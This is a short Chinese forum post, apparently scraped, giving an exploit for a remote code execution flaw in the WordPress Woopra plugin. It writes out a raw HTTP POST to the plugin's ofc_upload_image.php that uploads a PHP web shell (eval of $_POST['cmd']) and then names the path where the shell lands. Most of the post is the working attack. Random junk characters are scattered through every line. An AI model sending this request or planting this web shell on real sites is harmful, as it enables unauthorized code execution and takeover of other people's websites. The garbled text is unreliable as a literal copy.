照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/
0 |; n! w G/ l) b此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip e+ w! k% G p: T, l6 S! | f
exp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.13 n9 K3 n9 V0 d5 u% d( }
Host: ha.cker.in
6 D: [8 L& k+ O% s4 r- T' ]Proxy-Connection: keep-alive9 r. ^- Y- Q4 u$ G
Cache-Control: max-age=0
* }8 b& ^# r' j0 D/ GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.83 O& m4 `" i" p- o) u
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
$ e9 l' ?$ f! g0 A# zAccept-Encoding: gzip,deflate,sdch
, s. @/ D. |& J8 ?Accept-Language: zh-CN,zh;q=0.8
- }1 ~: C% d( vContent-Length: 28 <?php eval($_POST['cmd']); ?>
/ F" V/ L7 M5 I) x' I: l上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php$ t; W, X! d8 W2 [4 V- D" {7 s
|